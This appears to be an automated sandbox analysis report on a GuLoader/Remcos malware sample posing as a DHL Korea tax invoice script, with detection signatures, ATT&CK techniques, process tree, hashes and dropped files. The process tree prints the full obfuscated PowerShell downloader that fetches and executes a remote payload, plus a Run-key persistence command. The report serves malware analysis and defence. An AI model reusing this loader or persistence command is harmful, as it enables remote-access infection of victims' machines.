guloader | 3c5f563b531f76c538885b14a185f975e7400b4acb28a03fd950333516861eee

Resubmissions

26-06-2024 17:39

240626-v8mcqavdpa 8

26-06-2024 12:08

240626-pavzbawhnl 10

Analysis

max time kernel
118s
max time network
118s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
26-06-2024 12:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DHL_Korea_Tax_Invoice_6064457135pdf.vbe
Size

9KB
MD5

27b373a50962c2f8fe26274c147195cd
SHA1

1bba2d71036d371f78d628ac9c6cc13221d9ee89
SHA256

3c5f563b531f76c538885b14a185f975e7400b4acb28a03fd950333516861eee
SHA512

dde61a1a192e888bd47135be665678b2334efb8d860ec0ea2224e1d17b95da3cbdad3fb79eff428ae99e0514d8e301d2b424c54127f8f621889e95a4ed888111
SSDEEP

192:pzu36F4teCvSV/mcS36C2W3E11hEAGst4QoKVYHva607dqh2eyTxN8mSVqn:436Se4z36A3cDt/Rdb8miqn

Score

10^/10

guloader remcos downloader execution persistence rat upx

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 1632 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1632 powershell.exe
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
upx

Processes:

resource yara_rule

behavioral1/memory/2904-25-0x0000000000400000-0x0000000000581000-memory.dmp upx

flow	pid	process
5	1632	powershell.exe

pid	process
1632	powershell.exe

resource	yara_rule
behavioral1/memory/2904-25-0x0000000000400000-0x0000000000581000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Epicarp = "%Easels% -w 1 $Videreuddannelses=(Get-ItemProperty -Path 'HKCU:\\Drivtmmers\\').Loplukkeres;%Easels% ($Videreuddannelses)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

2904 wab.exe
2904 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2512 powershell.exe
2904 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2512 set thread context of 2904 2512 powershell.exe wab.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2756 reg.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid process

1632 powershell.exe
2512 powershell.exe
2512 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2512 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1632 powershell.exe
Token: SeDebugPrivilege 2512 powershell.exe

pid	process
2904	wab.exe
2904	wab.exe

pid	process
2512	powershell.exe
2904	wab.exe

description	pid	process	target process
PID 2512 set thread context of 2904	2512	powershell.exe	wab.exe

pid	process
2756	reg.exe

pid	process
1632	powershell.exe
2512	powershell.exe
2512	powershell.exe

pid	process
2512	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	2512	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 2148 wrote to memory of 1632	2148	WScript.exe	powershell.exe
PID 2148 wrote to memory of 1632	2148	WScript.exe	powershell.exe
PID 2148 wrote to memory of 1632	2148	WScript.exe	powershell.exe
PID 1632 wrote to memory of 2556	1632	powershell.exe	cmd.exe
PID 1632 wrote to memory of 2556	1632	powershell.exe	cmd.exe
PID 1632 wrote to memory of 2556	1632	powershell.exe	cmd.exe
PID 1632 wrote to memory of 2512	1632	powershell.exe	powershell.exe
PID 1632 wrote to memory of 2512	1632	powershell.exe	powershell.exe
PID 1632 wrote to memory of 2512	1632	powershell.exe	powershell.exe
PID 1632 wrote to memory of 2512	1632	powershell.exe	powershell.exe
PID 2512 wrote to memory of 2440	2512	powershell.exe	cmd.exe
PID 2512 wrote to memory of 2440	2512	powershell.exe	cmd.exe
PID 2512 wrote to memory of 2440	2512	powershell.exe	cmd.exe
PID 2512 wrote to memory of 2440	2512	powershell.exe	cmd.exe
PID 2512 wrote to memory of 2904	2512	powershell.exe	wab.exe
PID 2512 wrote to memory of 2904	2512	powershell.exe	wab.exe
PID 2512 wrote to memory of 2904	2512	powershell.exe	wab.exe
PID 2512 wrote to memory of 2904	2512	powershell.exe	wab.exe
PID 2512 wrote to memory of 2904	2512	powershell.exe	wab.exe
PID 2512 wrote to memory of 2904	2512	powershell.exe	wab.exe
PID 2904 wrote to memory of 1200	2904	wab.exe	cmd.exe
PID 2904 wrote to memory of 1200	2904	wab.exe	cmd.exe
PID 2904 wrote to memory of 1200	2904	wab.exe	cmd.exe
PID 2904 wrote to memory of 1200	2904	wab.exe	cmd.exe
PID 1200 wrote to memory of 2756	1200	cmd.exe	reg.exe
PID 1200 wrote to memory of 2756	1200	cmd.exe	reg.exe
PID 1200 wrote to memory of 2756	1200	cmd.exe	reg.exe
PID 1200 wrote to memory of 2756	1200	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL_Korea_Tax_Invoice_6064457135pdf.vbe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden "cls;write 'Strainableness Vinhandler Unjagtigheder Manipuleringers subsumtionernes Klippegulve Executer Ketogenic Palmeries Stringmaking';$Dramaticism = 1;Function Hkeraands($Uddebatterede254){$Nine=$Uddebatterede254.Length-$Dramaticism;$Uricacidemia='SUBSTRIN';$Uricacidemia+='G';For( $Financieret=4;$Financieret -lt $Nine;$Financieret+=5){$Strainableness+=$Uddebatterede254.$Uricacidemia.Invoke( $Financieret, $Dramaticism);}$Strainableness;}function Karolinger($Oplivelses228){ & ($Sobralia) ($Oplivelses228);}$Overtroubling=Hkeraands 'LevnM KonoS mmzSt.liRen lGudml Ha.adosh/Para5 Hem.Raa 0Ddn, M.li(DamaWUltriDrtrntho,dAn toSprowAbansF rl FestNYechTBryl Roug1Fin.0Ce,l.Cl s0Pult; Tin KlleWAst.iAb,dnTri,6 De 4Omsk;Fors J.hsxFlip6Tegn4Biav;Pro BowlrZambvAdst:r,kl1Accr2Fird1Grn,.Endo0Bala)Beta wennGHandeFlamcStr kIncooFus,/Rel,2No,a0 Le 1Trev0Kult0St.t1Prlu0Acet1Glad AadsFCanciOctar LeneStorfArchoExtex lti/scyt1Void2Camp1Sli.. Mat0 als ';$Disputativeness=Hkeraands 'HoveU SupsI nieForrr Fo.-TaktAReprgDureeSlovnKirstFusi ';$subsumtionernes=Hkeraands ' LymhSvigt TyvtS ukpBort: Mod/ Pa /PatrmBhimaDiscsS.umoDrev.DowngY ere bry/GildwBilapA kl-SkidaMic dMe,omIbruiBlokn ram/Ar,iF EnglRetuuUvitin cod Sa,eDisc.,odoxT,dssRi on Lag ';$underthrust=Hkeraands 'Kva,>stra ';$Sobralia=Hkeraands 'Pyfei NeoeS,pexUmul ';$Sogneraadsmedlemmers='Ketogenic';$Acalycinous = Hkeraands 'Ferte Gy.cShakhGruboK,de Subn% RenaNonmpC,arpfigudTe,oa de.tStvlaSamm%Fors\ ,crCNudiaFlomnjungdPersoDemalKonflUndeeZi.caCalc.,ogtLCamenGen.gDipo .ype&Supe&D ss Ma aeUndfcC.lihBoreoSam. HndtVing ';Karolinger (Hkeraands 'V,lf$Unfig orlW,elo Un b OmkaN dglPhas:DaveOlukrpMedar Ti e ndrgTortnBrn.iLandnFes gsysteHo arPropn Resek.vi=Bo,i( Felc FyrmLatyd,rev Tnk/Bes c Tro Una.$ proACl acDk aaFattlhoveyTermcInc.iFingnSubmoRegau Skyssutt)Forh ');Karolinger (Hkeraands 'Va y$Lng,gV telScoroCymabSympaBepolPrfi: .amMHabeaRegnnRespiNet,pDrukuGei.llaboe F.arCalci St.nTvregKe.peOmpor foss adi=,jem$IsogsKombuBeunbKorrscinnuSt.nmPinwt omi Sn,oSvi nDubhecatar StanOrate reisLup..Fikss,unkpGhoslUd.ri CortS at( Jor$utf,uIns.n ocidSn fe rykr ubpt .pihHornrGoyauT.aus Balt Unn) Zos ');Karolinger (Hkeraands 's,ne[PickNJohneLflatTrem.MomsSun tePiglr CucvfiltiVi lc GreeBal.P,oreos,eaiFlucnks.st irpM.umbaBivenPyr.aStatgAlaneAn.er Pro]Yder:,eas:EsbaS P.seT arcCauduFakerDresi P,ctKni.y Mo.PTrylrSluroTreltSmouoautocNa ooGri,lJord ,yci=Re,e Ind[ RefNHoveeF astGaat.W inSRegieOratc TiluNondrA griPfaltGrnsy.laePunf rMe.lofa.vtLetvovivecOve.oBirdlKjerTStopySlippUnsteGeol]Kali:For,:SmagTOmrylXy ysScil1Apom2Roll ');$subsumtionernes=$Manipuleringers[0];$Unsleeping= (Hkeraands ' Tra$Re egPastlA teoPlasb SixaTonolO,ri:Intec rgeoTriolefteeOut oSstnpStrat SkreChrorTyt.aReprlTak.=stopNKonfeAfvawBrev-C.nvO,tribturajG.eye SticSc,rtFras Wa,nS .oryFa osEightMyele.vermChlo.FolkNIne e TratVisi.DeacWBarneOmfabTredCKysslAuxoiSndreSplenFe it');$Unsleeping+=$Opregningerne[1];Karolinger ($Unsleeping);Karolinger (Hkeraands 'Solu$Cre,cBie oSlg.lHockeCanuoI,dipSmigtNorde TegrSpuraGoallTjen. Ha HAcroe Conat.lvdBlane Asyr Phos Van[Forr$ NecD Br,idrams,rlgp entuIxodtAnteaWardtrefeiViriv ScrevilknIntee FissSnuss R,g]Ferr=Lo.s$AmtsOGebrvForfeUdderKooptEditrRet oTheauU,babIndsl br iL esnScrigInte ');$prebesetting=Hkeraands 'Gla,$PhoscMnteoEnerl PileKlejo arp InstShoweAprerK.aga.yrel ,ub.KokoD ,imoBilfwcontnhassl .azoHarnaRunid L.nFSegriBuillVirteKon (Spru$,remsMe suS udbPa ms SuruBrocmBilltK.liiUnbuoInt nSnareGogorByggnFinheSilksHype, Brn$SemiUBotsn Ligs HeleSofacKalouA,enrSiale unon SemeJyllsafsksTra )Flus ';$Unsecureness=$Opregningerne[0];Karolinger (Hkeraands 'Fors$MicrgLiqulDe.io.karb SanaFr mlInco:IdioP.rane Unsr,intsMagtoSilknVa teNongl Zo,sT,rg=,ane( F,uTNoneePhidsSp.rt B.a- TekPValeaConvtDesphErsa Digi$Se,iUge,lnEnkesPr,mePligcL nguDozer QuieB mbn tjee H vsSnursSpar)Luft ');while (!$Personels) {Karolinger (Hkeraands 'Comm$Ghougdrypl looM lablc caInjul Ca,:.gebPRockiBesml Skre tomwRecoo,edrr Deft angsPres= moi$AfkatGabtr,aalu tileHabi ') ;Karolinger $prebesetting;Karolinger (Hkeraands 'Sto SBermt .smaN adrPiqut Dis-KumuSPrillAnneeProdeBr.ap dog Dv.d4dish ');Karolinger (Hkeraands 'L.kr$ GrugpantlBru onondbOutkaFld l.ilh:Op.iP Bl,eUdforPerisJomfoBid.nBankeBesylAnorsUps =,sbe(cereTSgete,inds,nletEnto-geodPHotdaIdo,tAssohAmni Inde$.ottUTilan resK,raeC olcElvau nflrDdsdeDamrnF,lseRee.sOldwsUna.) ang ') ;Karolinger (Hkeraands 'Bron$HarmgCystlPh.toHmosbOp raBerelRadi: Ov U IbrnAtoljs,itaMucogAufatSkv.iAa yg Helh liteUnd.dBroceDencr Tse=man,$MyrtgDatal Tego Fi.bPigea Sknlbipi:.jtiVLy.tiRe tn OvehSystaScrinMu cd TrilFilme V nrMest+,alt+Sige%Amin$ SidMpr.gaRe,unUnseiSmerp t,eu panlSubseMas rDocuiSc.lnContg ,ubeTiggrPressspon.KlumcL,igoGuiduInvinImpetExtr ') ;$subsumtionernes=$Manipuleringers[$Unjagtigheder];}$Ophrenes121=302900;$Unintoxicating=28604;Karolinger (Hkeraands 'For.$ ,dbgNedtlB dsoTidsbCo maSkrulOver:LejePDvstaSpeclTirsmGambe RadrGl.pi Pare SfysMosa Co,g=Reli RserGJuleeOro.tRke -TogsC lvtoAntanHor tAntre HornSlietFont Udbo$MellUSkolnTearsPro.e juscSnupuSteer Ha,eNidinI dieops sGa,osSkae ');Karolinger (Hkeraands 'Syre$AdgagAur.l.orpoAp.rb.orhave tl all: CuiSBnkem hiaAmbdaSexag ArerDopniEndanlandeElved Fynenavns.aro Trol=Fur, Tull[AftaS adryTingsPrint drneE,spmHimm.Inn.CAs,ro.estnTillvFioreCollrBatwtVita]E hy: soc:,pprFNed rf,rloObj,m ConB GifaVelvsSma,eRhin6Bobl4,ndeSFrittHjttr U,wiUhelnPhysgSpre(Tilv$OcelPCo.kaMi ilForemGrobeKissrRekvi ForeStrasBraz) non ');Karolinger (Hkeraands 'To t$ H,ag Cool ProoSte bSaleaDimelForm:Th,rNMiskuAgnimAbsuiSurpnbrsnoA peu Jags.eltnPreeeU.prsNo.asA et Test=Gi u Pen[,larSSwanyThebsGardt Undepa tm Sym.CounT La,e FljxF.rmtreac.VagoE VernMudhcLarmoLemud B eiTa,hnIn sg viz]Pink:Ptil:Sy.lA UdpSTilsCFontIB muIWhut.Per G St,eDu,ctNonsS DowtHalvrRebliYawlnRvejgTele(Svej$PummSK olmTomaaHo,eaOptagF inr nexiAr hnNovoeMafid ,rue.eeks Cha)Skil ');Karolinger (Hkeraands 'V,lg$,lasg.idelS.reoHypob divaEpiclhvss:Lu alPhoba queyAmorl st.aUkal= Ka.$ palNSco.u No,mDekaiMaldn Rano.anduOr.ns sotnAfsoe Kams,andsA.se. phosAfg,uLbetb ,hos Af,tEuskropspiTelenUnshg Ind( Tud$Key,OEntup GibhFygerUngre idenChefeJ ersSepa1 Tor2 Fo 1Glor,Mu,t$ Hy,U .udnHereiRepanC,axt uroBrnex.ncaiCoffcDendaPhottSinkiSovsn OpegKlat)Disp ');Karolinger $layla;"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1632

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Candollea.Lng && echo t"
3⤵
PID:2556

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Strainableness Vinhandler Unjagtigheder Manipuleringers subsumtionernes Klippegulve Executer Ketogenic Palmeries Stringmaking';$Dramaticism = 1;Function Hkeraands($Uddebatterede254){$Nine=$Uddebatterede254.Length-$Dramaticism;$Uricacidemia='SUBSTRIN';$Uricacidemia+='G';For( $Financieret=4;$Financieret -lt $Nine;$Financieret+=5){$Strainableness+=$Uddebatterede254.$Uricacidemia.Invoke( $Financieret, $Dramaticism);}$Strainableness;}function Karolinger($Oplivelses228){ & ($Sobralia) ($Oplivelses228);}$Overtroubling=Hkeraands 'LevnM KonoS mmzSt.liRen lGudml Ha.adosh/Para5 Hem.Raa 0Ddn, M.li(DamaWUltriDrtrntho,dAn toSprowAbansF rl FestNYechTBryl Roug1Fin.0Ce,l.Cl s0Pult; Tin KlleWAst.iAb,dnTri,6 De 4Omsk;Fors J.hsxFlip6Tegn4Biav;Pro BowlrZambvAdst:r,kl1Accr2Fird1Grn,.Endo0Bala)Beta wennGHandeFlamcStr kIncooFus,/Rel,2No,a0 Le 1Trev0Kult0St.t1Prlu0Acet1Glad AadsFCanciOctar LeneStorfArchoExtex lti/scyt1Void2Camp1Sli.. Mat0 als ';$Disputativeness=Hkeraands 'HoveU SupsI nieForrr Fo.-TaktAReprgDureeSlovnKirstFusi ';$subsumtionernes=Hkeraands ' LymhSvigt TyvtS ukpBort: Mod/ Pa /PatrmBhimaDiscsS.umoDrev.DowngY ere bry/GildwBilapA kl-SkidaMic dMe,omIbruiBlokn ram/Ar,iF EnglRetuuUvitin cod Sa,eDisc.,odoxT,dssRi on Lag ';$underthrust=Hkeraands 'Kva,>stra ';$Sobralia=Hkeraands 'Pyfei NeoeS,pexUmul ';$Sogneraadsmedlemmers='Ketogenic';$Acalycinous = Hkeraands 'Ferte Gy.cShakhGruboK,de Subn% RenaNonmpC,arpfigudTe,oa de.tStvlaSamm%Fors\ ,crCNudiaFlomnjungdPersoDemalKonflUndeeZi.caCalc.,ogtLCamenGen.gDipo .ype&Supe&D ss Ma aeUndfcC.lihBoreoSam. HndtVing ';Karolinger (Hkeraands 'V,lf$Unfig orlW,elo Un b OmkaN dglPhas:DaveOlukrpMedar Ti e ndrgTortnBrn.iLandnFes gsysteHo arPropn Resek.vi=Bo,i( Felc FyrmLatyd,rev Tnk/Bes c Tro Una.$ proACl acDk aaFattlhoveyTermcInc.iFingnSubmoRegau Skyssutt)Forh ');Karolinger (Hkeraands 'Va y$Lng,gV telScoroCymabSympaBepolPrfi: .amMHabeaRegnnRespiNet,pDrukuGei.llaboe F.arCalci St.nTvregKe.peOmpor foss adi=,jem$IsogsKombuBeunbKorrscinnuSt.nmPinwt omi Sn,oSvi nDubhecatar StanOrate reisLup..Fikss,unkpGhoslUd.ri CortS at( Jor$utf,uIns.n ocidSn fe rykr ubpt .pihHornrGoyauT.aus Balt Unn) Zos ');Karolinger (Hkeraands 's,ne[PickNJohneLflatTrem.MomsSun tePiglr CucvfiltiVi lc GreeBal.P,oreos,eaiFlucnks.st irpM.umbaBivenPyr.aStatgAlaneAn.er Pro]Yder:,eas:EsbaS P.seT arcCauduFakerDresi P,ctKni.y Mo.PTrylrSluroTreltSmouoautocNa ooGri,lJord ,yci=Re,e Ind[ RefNHoveeF astGaat.W inSRegieOratc TiluNondrA griPfaltGrnsy.laePunf rMe.lofa.vtLetvovivecOve.oBirdlKjerTStopySlippUnsteGeol]Kali:For,:SmagTOmrylXy ysScil1Apom2Roll ');$subsumtionernes=$Manipuleringers[0];$Unsleeping= (Hkeraands ' Tra$Re egPastlA teoPlasb SixaTonolO,ri:Intec rgeoTriolefteeOut oSstnpStrat SkreChrorTyt.aReprlTak.=stopNKonfeAfvawBrev-C.nvO,tribturajG.eye SticSc,rtFras Wa,nS .oryFa osEightMyele.vermChlo.FolkNIne e TratVisi.DeacWBarneOmfabTredCKysslAuxoiSndreSplenFe it');$Unsleeping+=$Opregningerne[1];Karolinger ($Unsleeping);Karolinger (Hkeraands 'Solu$Cre,cBie oSlg.lHockeCanuoI,dipSmigtNorde TegrSpuraGoallTjen. Ha HAcroe Conat.lvdBlane Asyr Phos Van[Forr$ NecD Br,idrams,rlgp entuIxodtAnteaWardtrefeiViriv ScrevilknIntee FissSnuss R,g]Ferr=Lo.s$AmtsOGebrvForfeUdderKooptEditrRet oTheauU,babIndsl br iL esnScrigInte ');$prebesetting=Hkeraands 'Gla,$PhoscMnteoEnerl PileKlejo arp InstShoweAprerK.aga.yrel ,ub.KokoD ,imoBilfwcontnhassl .azoHarnaRunid L.nFSegriBuillVirteKon (Spru$,remsMe suS udbPa ms SuruBrocmBilltK.liiUnbuoInt nSnareGogorByggnFinheSilksHype, Brn$SemiUBotsn Ligs HeleSofacKalouA,enrSiale unon SemeJyllsafsksTra )Flus ';$Unsecureness=$Opregningerne[0];Karolinger (Hkeraands 'Fors$MicrgLiqulDe.io.karb SanaFr mlInco:IdioP.rane Unsr,intsMagtoSilknVa teNongl Zo,sT,rg=,ane( F,uTNoneePhidsSp.rt B.a- TekPValeaConvtDesphErsa Digi$Se,iUge,lnEnkesPr,mePligcL nguDozer QuieB mbn tjee H vsSnursSpar)Luft ');while (!$Personels) {Karolinger (Hkeraands 'Comm$Ghougdrypl looM lablc caInjul Ca,:.gebPRockiBesml Skre tomwRecoo,edrr Deft angsPres= moi$AfkatGabtr,aalu tileHabi ') ;Karolinger $prebesetting;Karolinger (Hkeraands 'Sto SBermt .smaN adrPiqut Dis-KumuSPrillAnneeProdeBr.ap dog Dv.d4dish ');Karolinger (Hkeraands 'L.kr$ GrugpantlBru onondbOutkaFld l.ilh:Op.iP Bl,eUdforPerisJomfoBid.nBankeBesylAnorsUps =,sbe(cereTSgete,inds,nletEnto-geodPHotdaIdo,tAssohAmni Inde$.ottUTilan resK,raeC olcElvau nflrDdsdeDamrnF,lseRee.sOldwsUna.) ang ') ;Karolinger (Hkeraands 'Bron$HarmgCystlPh.toHmosbOp raBerelRadi: Ov U IbrnAtoljs,itaMucogAufatSkv.iAa yg Helh liteUnd.dBroceDencr Tse=man,$MyrtgDatal Tego Fi.bPigea Sknlbipi:.jtiVLy.tiRe tn OvehSystaScrinMu cd TrilFilme V nrMest+,alt+Sige%Amin$ SidMpr.gaRe,unUnseiSmerp t,eu panlSubseMas rDocuiSc.lnContg ,ubeTiggrPressspon.KlumcL,igoGuiduInvinImpetExtr ') ;$subsumtionernes=$Manipuleringers[$Unjagtigheder];}$Ophrenes121=302900;$Unintoxicating=28604;Karolinger (Hkeraands 'For.$ ,dbgNedtlB dsoTidsbCo maSkrulOver:LejePDvstaSpeclTirsmGambe RadrGl.pi Pare SfysMosa Co,g=Reli RserGJuleeOro.tRke -TogsC lvtoAntanHor tAntre HornSlietFont Udbo$MellUSkolnTearsPro.e juscSnupuSteer Ha,eNidinI dieops sGa,osSkae ');Karolinger (Hkeraands 'Syre$AdgagAur.l.orpoAp.rb.orhave tl all: CuiSBnkem hiaAmbdaSexag ArerDopniEndanlandeElved Fynenavns.aro Trol=Fur, Tull[AftaS adryTingsPrint drneE,spmHimm.Inn.CAs,ro.estnTillvFioreCollrBatwtVita]E hy: soc:,pprFNed rf,rloObj,m ConB GifaVelvsSma,eRhin6Bobl4,ndeSFrittHjttr U,wiUhelnPhysgSpre(Tilv$OcelPCo.kaMi ilForemGrobeKissrRekvi ForeStrasBraz) non ');Karolinger (Hkeraands 'To t$ H,ag Cool ProoSte bSaleaDimelForm:Th,rNMiskuAgnimAbsuiSurpnbrsnoA peu Jags.eltnPreeeU.prsNo.asA et Test=Gi u Pen[,larSSwanyThebsGardt Undepa tm Sym.CounT La,e FljxF.rmtreac.VagoE VernMudhcLarmoLemud B eiTa,hnIn sg viz]Pink:Ptil:Sy.lA UdpSTilsCFontIB muIWhut.Per G St,eDu,ctNonsS DowtHalvrRebliYawlnRvejgTele(Svej$PummSK olmTomaaHo,eaOptagF inr nexiAr hnNovoeMafid ,rue.eeks Cha)Skil ');Karolinger (Hkeraands 'V,lg$,lasg.idelS.reoHypob divaEpiclhvss:Lu alPhoba queyAmorl st.aUkal= Ka.$ palNSco.u No,mDekaiMaldn Rano.anduOr.ns sotnAfsoe Kams,andsA.se. phosAfg,uLbetb ,hos Af,tEuskropspiTelenUnshg Ind( Tud$Key,OEntup GibhFygerUngre idenChefeJ ersSepa1 Tor2 Fo 1Glor,Mu,t$ Hy,U .udnHereiRepanC,axt uroBrnex.ncaiCoffcDendaPhottSinkiSovsn OpegKlat)Disp ');Karolinger $layla;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2512

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Candollea.Lng && echo t"
4⤵
PID:2440

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2904

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epicarp" /t REG_EXPAND_SZ /d "%Easels% -w 1 $Videreuddannelses=(Get-ItemProperty -Path 'HKCU:\Drivtmmers\').Loplukkeres;%Easels% ($Videreuddannelses)"
5⤵
- Suspicious use of WriteProcessMemory
PID:1200

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Epicarp" /t REG_EXPAND_SZ /d "%Easels% -w 1 $Videreuddannelses=(Get-ItemProperty -Path 'HKCU:\Drivtmmers\').Loplukkeres;%Easels% ($Videreuddannelses)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:2756

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Candollea.Lng
Filesize
431KB

MD5
1108e06376421f62462c79cc5ffc66e6

SHA1
8a274698fc2796c729b3b849197607468361031d

SHA256
976127a2f0eae89e47e054f75ebe9e4218b264071a11411ce77b20d4124431fb

SHA512
9cdffb2ba2d7b7e62b528a8b9009cefdd65348b68f7fbfd78ad33372fde47ca7c73625c6fc47e458adf5ef5ae355b6756fa871257370bc258bdc51253168ba4a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4N20YE3ABJZOGBDE8P63.temp
Filesize
7KB

MD5
3fee66480099bdc80d33338bf71116f1

SHA1
24b1bf11ec0be3d3343d0c0791f6e4bce848657b

SHA256
c33cbb6df5c6c586622b8e566827ba7e238079b41a6211fa6a2f6a8645eadd07

SHA512
d75ccde7dfeacdc6c4fce5df70647674387f9c8823164cf1a801acdfe548d9ce03b200d0e4e7e329017b658adeaf09887f52017f8398a557917e16e7e287ddc7

Download Submit
memory/1632-8-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

Filesize
9.6MB

Download
memory/1632-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/1632-4-0x000007FEF5C7E000-0x000007FEF5C7F000-memory.dmp

Filesize
4KB

Download
memory/1632-9-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

Filesize
9.6MB

Download
memory/1632-10-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

Filesize
9.6MB

Download
memory/1632-11-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

Filesize
9.6MB

Download
memory/1632-6-0x00000000022C0000-0x00000000022C8000-memory.dmp

Filesize
32KB

Download
memory/1632-7-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

Filesize
9.6MB

Download
memory/1632-26-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

Filesize
9.6MB

Download
memory/1632-18-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

Filesize
9.6MB

Download
memory/1632-19-0x000007FEF5C7E000-0x000007FEF5C7F000-memory.dmp

Filesize
4KB

Download
memory/2512-17-0x0000000006670000-0x000000000AD3B000-memory.dmp

Filesize
70.8MB

Download
memory/2904-21-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2904-25-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2904-23-0x0000000000E00000-0x00000000054CB000-memory.dmp

Filesize
70.8MB

Download